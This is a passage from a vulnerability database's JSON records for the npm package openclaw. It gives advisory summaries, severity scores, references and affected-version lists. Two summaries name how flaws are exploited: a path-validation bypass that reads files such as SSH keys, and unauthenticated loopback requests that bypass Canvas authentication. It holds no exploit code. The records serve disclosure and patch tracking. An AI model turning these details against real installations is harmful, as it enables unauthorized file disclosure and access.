{ "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-r3v5-2grc-429h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8aek-6dw1-tudj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91812?format=api", "vulnerability_id": "VCID-8uzb-xmf8-hbca", "summary": "OpenClaw is vulnerable to Path Traversal through path validation bypass\nOpenClaw through 2026.3.23 (fixed in commit 4797bbc) contains a path traversal vulnerability in media parsing that allows attackers to read arbitrary files by bypassing path validation in the isLikelyLocalPath() and isValidMedia() functions. Attackers can exploit incomplete validation and the allowBareFilename bypass to reference files outside the intended application sandbox, resulting in disclosure of sensitive information including system files, environment files, and SSH keys.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32846", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08194", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08191", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08208", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32846" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/54642", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/" } ], "url": "https://github.com/openclaw/openclaw/pull/54642" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32846", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32846" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-media-parsing-path-traversal-to-arbitrary-file-read", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-media-parsing-path-traversal-to-arbitrary-file-read" }, { "reference_url": "https://github.com/advisories/GHSA-hggm-x7r9-mm7v", "reference_id": "GHSA-hggm-x7r9-mm7v", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hggm-x7r9-mm7v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-32846", "GHSA-hggm-x7r9-mm7v" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8uzb-xmf8-hbca" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89569?format=api", "vulnerability_id": "VCID-8z7r-a8dv-eueb", "summary": "Duplicate Advisory: OpenClaw: Gateway Canvas local-direct requests bypass Canvas HTTP and WebSocket authentication\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-6mqc-jqh6-x8fc. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.23 contains an authentication bypass vulnerability in the Canvas gateway where authorizeCanvasRequest() unconditionally allows local-direct requests without validating bearer tokens or canvas capabilities. Attackers can send unauthenticated loopback HTTP and WebSocket requests to Canvas routes to bypass authentication and gain unauthorized access.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35634", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35634" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway" }, { "reference_url": "https://github.com/advisories/GHSA-9gvx-vj57-vqqx", "reference_id": "GHSA-9gvx-vj57-vqqx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9gvx-vj57-vqqx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110761?format=api", "purl": "pkg:npm/openclaw@2026.3.23", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": 